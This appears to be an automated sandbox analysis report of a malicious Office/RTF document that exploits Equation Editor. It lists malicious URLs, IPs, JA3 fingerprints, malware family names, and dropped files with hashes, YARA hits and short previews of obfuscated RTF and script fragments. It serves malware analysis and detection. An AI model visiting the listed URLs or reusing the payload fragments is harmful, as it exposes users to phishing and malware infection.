                                      http://tracking.casefunnel.io/f/a/Rm_muBgELNOYXrfnA2rqHg~~/AAAk-gA~/RgRooRgRP0QraHR0cHM6Ly9hbnoucGZtLmxhdy9nby9abFNTR1BhZU0zR2lKdDJkQjlOaVcFc3BjZXVCCma8EZO-Zrv1GN1SEWpvaG5AY2FyY2guY29tLmF1WAQAAAADGet hashmaliciousUnknownBrowse
                                      • 18.244.18.83
                                      http://www.trailhopper.com.au/Get hashmaliciousUnknownBrowse
                                      • 35.163.34.239
                                      https://eu-central-1.protection.sophos.com/?d=gminfo.ca&u=aHR0cHM6Ly9lbWFpbC5nbWluZm8uY2EvZGVmYXVsdC5hc3B4P2Noa01lU3VwcG9ydD1WREVCa2tFdjdseDJXRWJVeWwrZ1ZES2JoWkZGdU50cVViSzdhUFFrallBPSZXVEQ9SE9TVEVERU1BSUwmREVTVFVSTD1odHRwczovL2ZveGxvYy5jb20uYnIvZzYzaC9Tc2MvMTMyMzEvIz9lbWFpbD1jM1JvWVc1bFFITnpZeTV1YzNjdVoyOTJMbUYx&p=m&i=NWNiN2ZlZTg4MWQzYmMxNDQ2YTllOTE5&t=NGlodXBZd3F2b0Vvc0plS2hTeXd3SEhsaVlMVytXaWNzQ09BY2Rldmd0az0=&h=bab690d673ac481583987ebddafa0d60&s=AVNPUEhUT0NFTkNSWVBUSVbXqk5OGw3-LylRHxwfv-ivWx6lKFVvrrcLij6A6abnONbmhYiy7nEsEwjVfelTdleNOdKogTENbJfP6k1moiI1bRTvTDqEc5vwY_tu8kQmvLMy1_HGLTzQ6TngySr1BcEGet hashmaliciousUnknownBrowse
                                      • 3.161.82.108
                                      PLHDMRefresh.exeGet hashmaliciousUnknownBrowse
                                      • 52.16.59.228
                                      PLHDMRefresh.exeGet hashmaliciousUnknownBrowse
                                      • 52.16.59.228
                                      https://ladentiste.in/portalserverloading/npf1dwpar6jvqtbgya/eXVsaXlhLmtyaWt1bm92YUB0YWJvcmRhc29sdXRpb25zLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                      • 18.197.30.174
                                      http://pub-30c4d31a268d4f42bc038673bc5c240f.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                      • 3.72.140.173
                                      http://pub-947defa6cbbf44389a1d6814639b3899.r2.dev/bea272.htmlGet hashmaliciousUnknownBrowse
                                      • 3.72.140.173
                                      http://telegram-fordating.vercel.app/Get hashmaliciousUnknownBrowse
                                      • 76.76.21.93
                                      LINODE-APLinodeLLCUShttps://in.xero.com/api/SRW1FFMpJJ6NyxW6fFhZC67DlbYU8rmnGQN2RqJv/getfile?fileId=08f6bbe8-2f83-4c63-a2f2-4c3331dc5be0Get hashmaliciousHTMLPhisherBrowse
                                      • 198.58.127.191
                                      http://ixts.org/DvueZCGet hashmaliciousUnknownBrowse
                                      • 104.200.18.130
                                      $R8RQPQE.htaGet hashmaliciousUnknownBrowse
                                      • 45.79.19.196
                                      http://radio-en-ligne.frGet hashmaliciousUnknownBrowse
                                      • 172.105.221.240
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                                      • 45.33.6.223
                                      https://bet-mgm.site/Get hashmaliciousUnknownBrowse
                                      • 69.164.203.87
                                      https://alfapak.salesmate.io/fe/document-manager/download/18b17b4b-2a0b-4c37-bc0a-eca3d24696f0Get hashmaliciousHTMLPhisherBrowse
                                      • 198.58.127.191
                                      http://rechge.tresstalkoll.in/Get hashmaliciousUnknownBrowse
                                      • 45.33.3.184
                                      DevolucionImpuestoJulioTGR.cmd_BQVDQNuQQAGG.cmdGet hashmaliciousUnknownBrowse
                                      • 104.200.20.184
                                      https://secure.payment-gateway.microransom.us/Xd3Y1TGRkT0h0dm1PaFg5NURrbVh3aHNGMlBPdjFGb25sVkR2c1FHa1VxcFUzYm53eVV1bGdNSjZnd1lTTVZrVXlTTWorTFUyaG1uUWgvOGZkME1pVVI3cHoxVnptQU56QzVUTnlCaWgvR3NJREFGQUM5UDcyS0Jhd2d4T3VqSlg4TjNqcG5EM2J5REZmUVNYQ2NFZFkxSUhOY2dBMjVBWmdnOFdOQ0d2dGlMY2hXeVRjNEpDQ2wxZERnPT0tLTBXQUJWVTRmVFl2aGlFQVotLUNkOG1yWVdOYUtJdmlTRUh5TnpXWWc9PQ==?cid=2139916325Get hashmaliciousUnknownBrowse
                                      • 173.255.203.101

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.1768.10646.xlsxGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.24913.8785.xlsxGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      • 207.241.232.154
                                      7dcce5b76c8b17472d024758970a406bInvoices_08142024.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3
                                      Dhl Shipment Documents.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      test1.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.1768.10646.xlsxGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsxGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.24913.8785.xlsxGet hashmaliciousUnknownBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.3568.4683.xlsxGet hashmaliciousGuLoaderBrowse
                                      • 188.114.97.3
                                      SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsxGet hashmaliciousRemcosBrowse
                                      • 188.114.97.3

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\sqlite3.dllAWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                                        RFQ-0122-07-2024.xlsGet hashmaliciousFormBookBrowse
                                          APR PAYROLL.docGet hashmaliciousFormBookBrowse
                                            SSLTD.xlsGet hashmaliciousFormBookBrowse
                                              81304938_19012023_083155.xlsGet hashmaliciousFormBookBrowse
                                                ORDER SPECIFICATION.xlsxGet hashmaliciousFormBookBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025683810752253594
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcM3G49HvxggLRKxvvfVjRXv//4tfnRujlw//+GtluJ/eRuj:I3DP7GwPWx/nvYg3J/
                                                  MD5:186DB7206B15C6C5E688114C4A741D59
                                                  SHA1:D47A39580DD7D053BBADE5ABCA93EDC5FBCE9BA5
                                                  SHA-256:DE1DBAB948BC3EAF2875FBAC8EE16D2BB3CFE79C3415CECCE74795D495D4AE0E
                                                  SHA-512:C5DF95A77DC15D195FF143AB63F73542930976AF2E699EDEC7B97A4427A329783603777CAA2EB5E7F7FF50717EEB5B25DA12364224AA99C2D681BC7DC590956E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:......M.eFy...z,}G1'K.K.w._.u.QS,...X.F...Fa.q................................$..J.u:/.j..........>..#...L.an_..7.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Rich Text Format data, version 1
                                                  Category:dropped
                                                  Size (bytes):87039
                                                  Entropy (8bit):2.707723186913918
                                                  Encrypted:false
                                                  SSDEEP:384:vlljImPUpgbUS2MEEsXAITo5hM0ZjgyrYJ6Y4K0Cgg:9WMmEMAITo5hM0ZjgpJ6Yl
                                                  MD5:D18067E4BE9CA434241869DDA26C5F8F
                                                  SHA1:E3F3ABCC32C87D48037D68577C3B625BB1C02636
                                                  SHA-256:F34155575606C4BB730C370E184B5581E724C35FA0161DA93F37E5263D476650
                                                  SHA-512:1D7BF63A5235E5F9C0815AC50EAD92775E1E6E1F72B3E53E3432B367F4B8504D411AC575085FEA6028085B1790D780F669C80C7455AE9C6C0D89F044A3E053BE
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:{\rtf1.......{\mmodsofldmpdata821588392 \+}.{\536321873`?7:?/5@_,>^3???.2.]9%30'!...;4~570.4],.:/-/:.130|6=!(..|>??)*[$?8.`:.2]>[(5;=+!9?]-|9>>*&,-3#%!.9%!%+>??;'3^.:'[:?7,^?^[>0$]76571**.~,.|;``%|?(,*8!60/@2._[>7>|4+1.?:?#+**.^5/&?=6=<?=*`^|_+=_4`3==>6`?]?3%?.9.,,6:[??#59~..>!.?!03[_`4]+(-)?2$?&.,?8:8&302,#?1??@34.[~%?9$6:,..~<_?,)_3@0^|8%.%1?(=`?!1|7<:^?|@14&&=?^#=3*#'*7.!(2,<..1:?^=8=)`?.8!7#^7<+6?^.%.1+3#7.28%8/',/?.)3['6%4&<$:.:[(979]?:%(.)?-5512~?0/&.^!`.1/.?:5*5]#0.?$_<2|9#`/_21.?&`!89).$#6>!`>(<%<]?#@_('$6%%7.9>??%|,27?[$;?%...?#?&||'<*$?@%..[&*]`|7%;%8%*?<?3)>..%;([%%0~<_,*,#$!^??@6'7*[!.#?5[,.|1,]|8/^8`'$:2?^.*22?3?,&,'=@~~9?#5*'.0.?%2<,<+==*^=`!_]?|!.7.@8%/4??='#[(.3$>6%1_@7#1|`#[*86|4]1<=6,|?7!-?.3_`^:.-=@.??0]1?%^_.<>60%.5[:/7&&<=%7%?+^..85<+.=:~^3)/33![2=*+=.(1<|^|-%;.843|/.3+=-|[[.%?:,^,7?9.84?1^#>?%737)82+&|[*`)/3[]*(+.$)1.$!6@].>#!5;..6[.3-(4$7=.?,:=<?03?^53,,4$,70.^-_2*:8?]*(==.`?2>+26#38?/0-?'4[`1??#78=%9'7!+15;_7~6?68??1??=%6-(_.@=.<.)<#37&$`3039/;'>)7#;)]~?.5/??-.%

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3200000[1].zip

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):445968
                                                  Entropy (8bit):7.99884320164708
                                                  Encrypted:true
                                                  SSDEEP:12288:qqKn7azHyK26Fre95sdYzb+tDYlK3uUNBsO3bhvh+eB9Ez:Q+zHc6FreBzsDYUJYCn+eB9Ez
                                                  MD5:0D1613320B79DE7E8C7627C07D19F4A7
                                                  SHA1:F85B78ED8568A648B9134BEB654E384C622C73BD
                                                  SHA-256:E6FC736D8850729EE5D9D65076E0F4A869530B2C5DF7239BDA47051FA3C04BE7
                                                  SHA-512:13C00D2A48A42C3DA05C6F475AB9B0581C951DD62CA0B435C44DBCEFDFC02F14597B2B33AA28D3C4C8526ADB198B24F1A83D92B12612209CA4AED06B80C7CBFA
                                                  Malicious:false
                                                  Preview:PK...........K..A.............sqlite3.defUT......Y...Yux.........d.......(...y.d....r.Tv.{sa,......=3O.......>..B............*..$...&.L....T...1..?..5.<....iUF.KO....b.>sU8...0[.....Y.Y.y$..p..8k.L.u+...5'.pb....I.D..)...t....!;....:....[....}u.t....#..Hj.#{...Xz2~us..C..L.a.M..`P;..| .......96b.. \.&...t.Y.....Z...N.`......nx(..s$..x.P..".Y..,h...H.>.qX.'#x.T.F.x.Txf.e.M.. .q.nW...iNF.D"....o.d.v.U...Qv(....c..D.=.....`..*......i.k.4.&^..5F.*..eA.....|..9.l.K.M..~............fI.;...f.1:....).K)\.....`r.[.4>..[Z.|..7.A..hE.Hm.rR..._p.R6.t.I.0y.['..#.Nx.I..7.K .P9......]..G...l.N..1.&...>......T} L.\.Kbu.=..c.`,.B.y.^.........G[A...{par...?..q6v^.aO..d-...O.[.v~....N$...$0...^.v...)T.+-..p.k.=.D...3"3`=Ha......,..1.F..7... .$z.H..z.c."k..9g'...p.-..2Y.A.z.....;..M9@el............~.U&q.........f-.K.cke.]..b.Xw..o).X.a.cq;.`.Ljy.....t.W.w...8.{.b.%.6n...t........R.WT8........E..q!......x...:...g..K...>...I-N.y.....{k..5...7]..v.......{....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mekissedbutterburnwithstronglips[1].tiff

                                                  Download File
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):182866
                                                  Entropy (8bit):3.862898281280299
                                                  Encrypted:false
                                                  SSDEEP:3072:B/xKUPE+y6rvwugt5pYGwKAyIxFnQ1IlwJCac29W4QcPnybeNdH+CciTXhMhv:/JPE+TwzAyIxFnQ1IlwJCac29W4Qczdc
                                                  MD5:D1E9E89D71457C35E8A8FF31EADFD642
                                                  SHA1:E2654F19CE0282BDB9FA8F4D10ADACB4ADFDFD87
                                                  SHA-256:5471914F742D78458A2D51C614477F695E79A6ED17156B2D735B7B3BEBCBE7D4
                                                  SHA-512:011F62153D1252ADC1A2793F014541ED8AC7B2753069FA66D809DC11AFAA1B64D768383AD4B3F7C0E97605DD28B2047C00C1AEA2DD8EA561026B8F4C013B73ED
                                                  Malicious:false
                                                  Preview:......J.x.A.b.K.W.G.z.A.R. .=. .".m.i.i.n.C.k.K.G.C.b.".....O.G.U.n.c.R.g.q.f.U. .=. .".L.K.P.o.z.z.J.z.c.G.".....x.K.c.G.r.R.c.c.c.l. .=. .".h.L.T.L.j.b.U.L.L.x.".....P.c.z.z.l.O.p.L.m.d. .=. .".z.c.i.L.a.p.x.O.B.j.".....k.W.A.k.o.W.K.N.K.i. .=. .".G.z.Z.a.a.i.A.L.G.N.".....Z.W.k.c.L.A.U.P.m.e. .=. .".U.K.W.W.A.p.K.W.l.h.".....L.o.i.i.L.I.z.g.t.t. .=. .".v.f.i.B.h.f.L.W.c.G.".........a.L.b.e.L.d.e.n.p.u. .=. .".L.U.o.i.q.N.s.l.B.B.".....f.W.Z.n.s.K.W.L.C.f. .=. .".x.n.W.f.K.i.C.B.z.a.".....K.W.q.n.x.j.A.R.i.L. .=. .".L.K.Z.a.c.Q.t.q.p.h.".....m.k.z.Z.K.k.U.i.p.K. .=. .".a.R.d.p.v.k.e.a.q.z.".....p.s.P.L.i.L.S.L.Q.W. .=. .".Q.N.W.m.e.L.O.G.S.U.".....K.h.i.W.W.k.b.p.a.H. .=. .".W.m.W.n.L.U.C.L.B.a.".....q.U.g.L.l.K.G.I.a.O. .=. .".L.z.S.W.N.p.K.W.g.G.".....R.R.i.s.G.U.k.z.c.c. .=. .".m.Z.z.h.s.f.Z.L.I.n.".....A.z.Z.W.K.W.U.i.i.G. .=. .".r.K.p.U.c.W.p.Q.k.G.".....J.G.i.U.l.i.h.t.e.o. .=. .".U.I.f.Q.A.h.p.n.k.o.".........L.c.o.o.W.S.L.A.h.J. .=. .".N.r.c.b.R.n.u.b.h.O.".....Z.u.A.z.R.n.N.

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11FC6127.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):4610404
                                                  Entropy (8bit):2.4886753023403116
                                                  Encrypted:false
                                                  SSDEEP:12288:gD8dt3iGnjPjIwEasrwvAWXKcnXfxpwZasUkRaNHH/o1PWwTlZoJyS3oJjg4GAQe:gat3wwKuWh1OwLoJboJjg1AuKgNr+x
                                                  MD5:95A1DC4D0C20BE96D2E9C709CD7432BD
                                                  SHA1:6323D9025F40A5A35F28D02A1C17F22B61CB61E5
                                                  SHA-256:4A2169B3600EDD759FEB982CD08606C949F9A463AE3BD6692DEA9E43B74474E1
                                                  SHA-512:C303D1FE86C6B1691DC2E1322EB7167B9A7946FD9E9DD0767AA7594BF950C6D5616B85F834511681E30D0FF0CC34765BCD932731AD5299A6A1A70EA0519BD7DB
                                                  Malicious:false
                                                  Preview:....l...........P... ...........A_..+J.. EMF....dYF.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!...........................T...L.......................UU.A&..A............L.......................L..."...........!...............................................Q...!..."...........!...............................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Rich Text Format data, version 1
                                                  Category:dropped
                                                  Size (bytes):87039
                                                  Entropy (8bit):2.707723186913918
                                                  Encrypted:false
                                                  SSDEEP:384:vlljImPUpgbUS2MEEsXAITo5hM0ZjgyrYJ6Y4K0Cgg:9WMmEMAITo5hM0ZjgpJ6Yl
                                                  MD5:D18067E4BE9CA434241869DDA26C5F8F
                                                  SHA1:E3F3ABCC32C87D48037D68577C3B625BB1C02636
                                                  SHA-256:F34155575606C4BB730C370E184B5581E724C35FA0161DA93F37E5263D476650
                                                  SHA-512:1D7BF63A5235E5F9C0815AC50EAD92775E1E6E1F72B3E53E3432B367F4B8504D411AC575085FEA6028085B1790D780F669C80C7455AE9C6C0D89F044A3E053BE
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:{\rtf1.......{\mmodsofldmpdata821588392 \+}.{\536321873`?7:?/5@_,>^3???.2.]9%30'!...;4~570.4],.:/-/:.130|6=!(..|>??)*[$?8.`:.2]>[(5;=+!9?]-|9>>*&,-3#%!.9%!%+>??;'3^.:'[:?7,^?^[>0$]76571**.~,.|;``%|?(,*8!60/@2._[>7>|4+1.?:?#+**.^5/&?=6=<?=*`^|_+=_4`3==>6`?]?3%?.9.,,6:[??#59~..>!.?!03[_`4]+(-)?2$?&.,?8:8&302,#?1??@34.[~%?9$6:,..~<_?,)_3@0^|8%.%1?(=`?!1|7<:^?|@14&&=?^#=3*#'*7.!(2,<..1:?^=8=)`?.8!7#^7<+6?^.%.1+3#7.28%8/',/?.)3['6%4&<$:.:[(979]?:%(.)?-5512~?0/&.^!`.1/.?:5*5]#0.?$_<2|9#`/_21.?&`!89).$#6>!`>(<%<]?#@_('$6%%7.9>??%|,27?[$;?%...?#?&||'<*$?@%..[&*]`|7%;%8%*?<?3)>..%;([%%0~<_,*,#$!^??@6'7*[!.#?5[,.|1,]|8/^8`'$:2?^.*22?3?,&,'=@~~9?#5*'.0.?%2<,<+==*^=`!_]?|!.7.@8%/4??='#[(.3$>6%1_@7#1|`#[*86|4]1<=6,|?7!-?.3_`^:.-=@.??0]1?%^_.<>60%.5[:/7&&<=%7%?+^..85<+.=:~^3)/33![2=*+=.(1<|^|-%;.843|/.3+=-|[[.%?:,^,7?9.84?1^#>?%737)82+&|[*`)/3[]*(+.$)1.$!6@].>#!5;..6[.3-(4$7=.?,:=<?03?^53,,4$,70.^-_2*:8?]*(==.`?2>+26#38?/0-?'4[`1??#78=%9'7!+15;_7~6?68??1??=%6-(_.@=.<.)<#37&$`3039/;'>)7#;)]~?.5/??-.%

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8DE86AB.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):4610404
                                                  Entropy (8bit):2.4886753023403116
                                                  Encrypted:false
                                                  SSDEEP:12288:gD8dt3iGnjPjIwEasrwvAWXKcnXfxpwZasUkRaNHH/o1PWwTlZoJyS3oJjg4GAQe:gat3wwKuWh1OwLoJboJjg1AuKgNr+x
                                                  MD5:95A1DC4D0C20BE96D2E9C709CD7432BD
                                                  SHA1:6323D9025F40A5A35F28D02A1C17F22B61CB61E5
                                                  SHA-256:4A2169B3600EDD759FEB982CD08606C949F9A463AE3BD6692DEA9E43B74474E1
                                                  SHA-512:C303D1FE86C6B1691DC2E1322EB7167B9A7946FD9E9DD0767AA7594BF950C6D5616B85F834511681E30D0FF0CC34765BCD932731AD5299A6A1A70EA0519BD7DB
                                                  Malicious:false
                                                  Preview:....l...........P... ...........A_..+J.. EMF....dYF.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!..."...........!...............................................Q...!...........................T...L.......................UU.A&..A............L.......................L..."...........!...............................................Q...!..."...........!...............................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F55578FC.emf

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):45180
                                                  Entropy (8bit):3.1422684533680734
                                                  Encrypted:false
                                                  SSDEEP:384:bgAUPzu5ptXKUw6Lv7Jc90J/342jBZWtgJaENbiKdvJ8+oQs8G/:bgNI2qJ/5jBy2RDBo
                                                  MD5:5E75CD08428DBBE6D14EF77D1FDF8845
                                                  SHA1:BD32DB1F1EEF9C19532E0231BA50D4FEF756D885
                                                  SHA-256:FE77E90A1950A9E07BB9406885CB6C47F4B40B55352D5852F6484FEA926665D1
                                                  SHA-512:3CCACA588CA400E0FCD92823A13FEC598C9C81098A05F653CC7AAF59CB46A75D5C0B27C147F2E0D6AC9613EBAB6F470DB7E5EC61845039A3B5AB71B340C55C71
                                                  Malicious:false
                                                  Preview:....l...........;...............~@..xW.. EMF....|...5.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.................................................................7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.......................................................................................;..e............................................................................7......................@.N..............C.a.l.i.b.r.i...........

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5C909DDB-F3E7-47E0-A0E1-100901A3378E}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):2.765264748518336
                                                  Encrypted:false
                                                  SSDEEP:96:AkZMPiMnLHrIj4JiiAUMMPPtnLHrIj4JiiAU:iPiMnLLILSPPtnLLIL
                                                  MD5:A2A87F371F2FA4349823444EB1C29290
                                                  SHA1:20919FF701830CDAC8B7F43C7AA31C1C6AF70877
                                                  SHA-256:8532FCEF340522A05AB566D4F580B9685C369BC10AB38971BFF0F760C529E4AF
                                                  SHA-512:70B97C50523999ECECB6E5BD08A4841823C2A75F08A5F25540288C5EAF1C0DF1A143521DC2B34D072F48EA1F14A33761F13F5E22703EB4C48465CDE8E842B054
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5342CF6E-273D-4B0A-B650-86DA939B7398}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B268B3E0-58D4-4AFB-A024-1E5A891A4C64}.tmp

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12800
                                                  Entropy (8bit):3.5872069640772786
                                                  Encrypted:false
                                                  SSDEEP:384:tep1aKC0uoeHgYK9OTji3CrHNga0KTDqd1VLClVyqKOTe3hZ:rQoGWHvqJ2TDTcZ
                                                  MD5:A09917A0DEDC505AA1DB246C67376F9B
                                                  SHA1:05786E635F57D6FFC876590E329F94EEC35F4FBA
                                                  SHA-256:FE72E92374FFE6DC8B0C2D8C382A20053DC448D425F4570D7F27E5BFFD168860
